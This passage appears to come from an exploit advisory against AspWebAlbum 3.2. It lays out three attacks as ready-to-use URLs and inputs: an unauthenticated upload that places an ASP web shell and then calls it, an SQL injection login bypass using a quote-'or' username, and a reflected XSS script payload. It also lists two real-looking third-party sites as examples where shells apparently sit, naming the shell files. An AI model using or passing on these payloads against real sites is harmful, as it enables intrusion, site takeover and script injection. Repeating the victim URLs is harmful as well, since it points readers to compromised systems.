http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
and your shell adress: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2 #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ #
Ablaze rally 9-24-06/pics/klasvayv.asp #
# 2-Admin Bypass [AspWebAlbum 3.2] #
#
http://site.com/path/album.asp?action=login #
#
ASP/MS SQL Server login syntax #
#
Username:'or' #
Password:anything #
#
# 3-Xss Vulnerability [AspWebAlbum 3.2] #
# #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #